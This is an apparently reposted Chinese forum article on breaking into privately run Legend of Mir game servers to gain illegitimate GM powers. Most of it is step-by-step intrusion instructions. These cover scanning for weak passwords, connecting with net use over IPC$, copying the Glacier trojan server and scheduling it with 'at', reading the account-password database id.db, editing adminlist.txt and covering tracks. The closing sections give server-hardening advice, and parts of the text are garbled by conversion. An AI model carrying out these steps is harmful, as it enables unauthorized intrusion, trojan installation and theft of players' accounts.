传奇为什么存在非法GM的真正原因

下面是怎么做非法GM而不在GM文件里表现出来，也不是什么后门的标题标题题目，请看转帖，但愿大家严加防范~
如何在别人的做GM????
攻击低级教授教养 s
我在侵入别人4f所使用的方法
看到有些4f做的不错，但是进去又不是很有钱，也没装备，高手也很多，一直不喜欢在里面当菜鸟的我，一口吻进入他们的服务器端大闹一番之后。当足了gm的瘾，现在我把方法宣布与大家。。。。
实在我所使用的方法很简朴，只有４个工具：
（一）：shed.exe
（二）流光2000
（三）cmd.exe (实在就是２０００下的dos啦)！
（四）冰河8.4 操纵系统：win2000 server 或者winxp系统。 “shed.exe”:实在就是用来网上查共享资源的，速度快，可以查到很多服务断的共项文件，不外在这里面有些ｉｐ在浏览器中无法访问，这是由于其中也包含了个人上网的ｉｐ．呵呵！一些作网站，网吧的服务器一些目录都是共享的，有些是可以访问，但是不能删除，由于你所访问的都是以匿名访问的，所以权限不够！有些需要密码。碰到密码怎办？用流光！ “流光”虽说对202作了限制，但是对小日本的ip可是没有限制的，呵呵！所以说使用流光的ipc探测，建立一个空对话，查到用户列表，然后先简朴探测，此时有些网管懒惰，把administrator设置的过于简朴，呵呵，你就可以抓到了。
下一步如何做呢？也许在你查对方的端口时发现对方开的端口很少，好比ftp没开，怎办呢？冰河！ “冰河”，想必许多朋友都玩过，使用冰河控制一台服务器速度很快，（由于服务器那边带宽很大）几分钟就可以查到对方主机的主页所在位置。但是如何上传并且控制他呢？ “cmd.exe” 是２０００下的ｄｏｓ了，执行cmd.exe 使用net命令，
第一步：net use \\ip\ipc$　“password” /user:”user” 说明：以一个超级用户名与你想黑的网站建立联接，当然超级用户必需是该网站admin里的。这里的”ip”就是主机了，“password”就是超级用户的密码，“user”就是超级用户。好比：net use \\210.248.250.2\ipc$ “maozhiie” /user:"maozhijie"
第二步：copy g-server.exe \\ip\admin$\system32 说明：g-server.exe就是冰河的远程服务器端。意义：将此文件拷贝到对方的主机winnt里的system32目录里。也许有人要问木马侵入对方那边可以察觉出来的吧，呵呵！装了防火墙估计可以，不外很多主机没钱买呀！不像中国盗版满天飞！假如你有最新的木马也可以的！这是最好的了！！嘿嘿……
第三步：net time \\ip 察看对方的服务器时间。因为有时差，应该是一个小时吧！所以必需要以对方的服务器时间为准。
第四步：at \\ip time g-server.exe 这里的time就是对方的主机时间。作用：在划定时间执行该程序。好比　at \\210.248.250.2 19:55 g-server.exe 第五步：冰河就可以控制该电脑了。这个我就不说了吧，呵呵！菜鸟也会玩的软件。
这时我们就可以控制服务器了，
net use * \\ip\*$ 远程映射
看这个
mir.db里面有每个人的数据，并且没加密的，大家可以用
access找开来改一下，改几个极品，如0-80攻的木剑啊，0-50魔的六角戒指之类的，那就随你的便了。只是这样也太烦人了。呵呵。
好比武器,数据格局如下（全部是16进制）
** ** ** ** ce 00 43 12 88 13 01 02 03 04 05 06 07 08 09 00 00 0a
前面**的是物品代码，然后0xce 00 是武器代码(高位在后)，和物品db数据库中对应，
例：物品数据库中屠龙是序号（idx）是205,对应到这里就是（205+1）转为16进制是ce
后面的 43 12是当前持久度，88 13是最大持久度。
例：43 12换算成十进制为17170，持久度为17
后面的01 02 03依次是攻击、魔法、道术。
留意是在原武基础上增加。
例：上面的屠龙显示出来是攻击：5-36，道术：0-2，魔法：0-3。
后面的04 05 06 07 08 09依次是武器的 幸运、诅咒、正确、攻击速度、强度。
后面两个空位后紧跟的0x0a是表示武器是否被修炼，详细来说
给武器加攻击时：
修炼前：00
修炼后：0a
试验成功后：00，攻击值增加。
对于首饰和衣服,自己研究吧，这有好多人都知道的吧,我没细写。网上这方面的文章是有的，我就不用多说了吧？
然后到，|mirserver\mud2\logsrv\iddb下
这里有个id.db所有人的帐号和密码都在了，你看着办吧，不外偷人家的号也不是什么光荣的事，我是从来不做的，只是经常会拿gm的号来reload一下。呵呵
这里，我把你边走边看加到这个服务器的adminlist，呵呵，这里是打个比方，这里加入你的名字）,然后，我们到mir.db中找出gm的帐号，再到id.db中找出这个帐号的密码。好了，ok了，用gm号进入游戏（进之前m一下他啊，不要让人家发现了，也不要改人家的密码，让人家发现了多不好啊，呵呵）。打命令@reloadadmin。立刻out吧。
然后，把你加入adminlist的人物从adminlist里删除，好了，你进去游戏吧，你是gm了，可是真正的gm是不会从服务器端看到你的名字呢！！他也许在想“这里怎么了啊？似乎还有个gm？？？”。呵呵，不外不要过火了，不然人家一个reload你的权限就没了啊。
到这里大家做gm的梦就完成了，下面我说的就是怎么远程控制服务器主机了，好比给他关机啊重启啊····
技术我是一点都不懂。不外服务器安全方面仍是略懂一二哦！
服务器入侵主要靠的是帐号与密码。大家要先明白什么是系统帐号。什么是系统密码！
其它WINDOWS每一个系统都有着他的超级治理员帐号与密码！
一但这些被黑客扫描到的话，哪么你将会得到一个恐怕的威胁！
当你是人气高的时候。给黑客入侵的话，哪要是万一给删了数据。到时候。真的是惨不忍堵。
一：了解一下帐号的含义
先运行CMD
然后输入：net user（回车健）
这样后，会显示一例帐号
再查看管理员帐号
输入：net localgroup administrators
这就是查看administrators组的用户。这样的话若是人家用躲藏帐号的方法也会查出来！
系统自带的超级治理员帐号是administrator
记住这里显示出来多个帐号不明的帐号。哪就证实你机器不安全了。若泛起在的帐号都是你自已的帐号。哪百分之四十你机器未被入侵
帐号安全：
二：密码篇
你若觉得自已的帐号密码是123456哪么不出三秒人家就到你机上一游了。
修改密码方法，在DOS下修改更安全
输入net user 帐号名 需修改密码（然后回车健）
一般密码设复杂一点！
溢出：
2000服务器版装下去会自动装IIS的，若你觉得IIS没有什么用就停止。IIS地址：开始》》程序》》治理工具》》Internet信息服务（这个就是IIS）你将他开启。上面按停止！这样就进一步安全了。不外若IIS你需要用的话，哪么记得打目前最新的补丁SP4哦。
RPC溢出。大家记住，尝尝telnet IP 135看看有没有开着。若是开着。请打RPC补丁。若找不到。干脆装个防火墙，将135端屏蔽！
大家千万要记住。入侵系统最关点的就是要帐号密码。保护好自已帐号与密码。安全一定属于你！
本文引起泛博4f拥有者的留意
入侵传奇/充当非法GM。
首先，我得声明,我写本文并不是教大家如何去黑4f，只是想以本文引起泛博4f拥有者的留意
，进步自己的网管水平。
我爱玩游戏，但却玩得很菜，也没有时间去玩，只想玩着过瘾，所以，当我开始玩传奇时，
虽觉得是好玩，但玩盛大的简直是在受罪，进级慢，没好装备，处处受人欺负。所以，4f是明
智的选择，但进去时也没有好装备，也是受人欺负，难道我不可以做gm？尝尝，folling me！
找来一大堆4f的ip，开个x-scan扫吧。有了，还真不少，都是弱口令的，这些网管真菜呀。
选好一个，192.168.0.1,go！
打开cmd，
1）c:/>net use 192.168.0.1ipc$ "" /user:administrator
连接成功，
ok，连上了，成功在望，
2）c:/>copy 192.168.0.1d$mirservermir200enviradminlist.txt
系统找不到指定的文件。
没有？不可能吧？唔，一定是躲藏了，不要紧，再来，
3）c:>attrib -r -h 192.168.0.1d$mirservermir200enviradminlist.txt
没有提示，成功了，
这次连复制也不用了，直接改吧，
4）c:>edit 192.168.0.1d$mirservermir200enviradminlist.txt
会打开个介面，看看里面有哪些gm，加个吧，自己记得就行了，改完保存退出
5）c:>attrib +r +h 192.168.0.1d$mirservermir200enviradminlist.txt
把adminilist.txt还原成只读躲藏，
好了，大功告成，快打扫脚印吧，别让人发现被入侵了，
现在，就等着系统重启了，等不及的话就在第五步让它重启，不外这样太危险了，仍是等吧
，
第二天注册个帐号，新建个之前加的人名进去，
/who
当前150人在线
哈，我就是gm了。赶紧把自己进级，
@level -1
进级成功，255级，哈哈
再造出想要的装备，想要什么尽情造吧，
重复上面的把自己从adminlist.txt里删了，哈哈，好装备得手了，可以玩了
面记得有位朋友对加强对服务器安全xing的解决方法进行了一系列的说明,讲得非常具体,但是我觉得还有很多需要增补的地方.微软的系统是漏洞和补丁著称,真正要对服务器的安全配置确实非常困难,考虑的方面也太多了.
今天先讲一个方面的内容了,也算是对前面的朋友的进一步增补吧!
前面那位朋友所概述的主要是针对WIN2000系统弱口令的安全设置!他已经说得很仔细了,做到那些,口令这一关差不久不久未几了.确其实互联网的时代,口令真的非常重要.我对国外的主机进行了一系列的测试,就拿有弱口令的系统来说,还有不少!其中也包括了不少中小型企业的WEB服务器,E-MAIL,PROXY服务器都有这种初级的错误!
假如说你在这方面做得非常的仔细.但你至少还要仔细研究一下你主机现在所运行的有哪些服务,这些服务代表着什么?你应该很清晰!由于现在黑客软件,木马工具,远程控制软件大多是以一种服务的形式运行在你的服务器系统里,一般的防火墙,杀毒软件对其并没有任何反映的.对于服务形式泛起的控制工具.比较难得发现,所以你就必需在服务器里运行的哪些服务非常认识.对于目生或希奇的服务应该安全设置好.
下面我都WIN2000的WWW(IIS)服务器安全配置略讲一下,WWW服务在WIN2000SERVER,ADSERVER,DATACENTERSERVER,版本中是默认安装的,假如你不需要用2000的WWW服务的话,建议不要安装.至于添加/删除你可以控制面板的去掉他的安装,或者在"治理工具"/"服务"里设置WORD WIDE WEB SERVICE"启动类型为"手动/禁用"
这样的话系统就不默认启动改服务!
假如你需要用IIS来建站宣传一下自己的,你就必需按以下方法安全配置好IIS,
在IIS组件你首先要去掉你不需要的SMTP,SNNP,FTP,这样的话你可以降低你服务器运行所占用的CPU资源,和内存使用率.然后建议你删除你C:\INTERPUB\目录下的所有内容!或者更改路径.在IIS治理器中删除默认站点,(或者删除SCRIPTS这个虚拟目录)由于这个目录有可写的权限的.在新建的WEB站点中,设置IIS的权置,必需让它不能写入,或运行.由于IIS是默认支持ASP脚本的.然后在IIS中删除不需要的映射,这个很重要.假如你要支持PHP,CGI脚本的话,你还得配置好PHP.CGI的应用程序的准确映射,禁用或删除FSO组件,(去年深圳之窗就是被人家利用FSO黑了......)假如你要使用FSO的话,最好要改名!否则的话,你给别人提供主页上传的话,你肯定是会被黑的.小心呀!
目前在黑客横行的互联网空间中,利用IIS的漏洞,提申自己的权限,而成为AD,这些只是轻而易举的事情,这不需要花几天的时间去暴力破解一下口令,像自己架设的WEB服务器有种情况,更是数不甚数了.关于怎利用UNICODE漏洞去提供AD权限的文章,网上太多了,我就不久不久未几讲了.
这些来说应该是服务器安全防范方面的一个例子而已,真正要做到服务器的安全运行,需要你花大量的时间去试探.由于这些来说,足以应付一些无聊的.....当然了,你假如需要WEB服务器,我仍是建议你去使用AP了.他的源代码开发,免费,安全xing不乱xing都比IIS强得多了.
假如你还有许多要和我讨论的标题标题题目,可以直接与我联系了.到于LINUX的安全xing标题标题题目,AP的标题标题题目,2000的一些防黑措拖,以及反黑,跟踪黑客攻击,对付DDOS的标题标题题目都可以与我讨论,想说的话其实太多,但......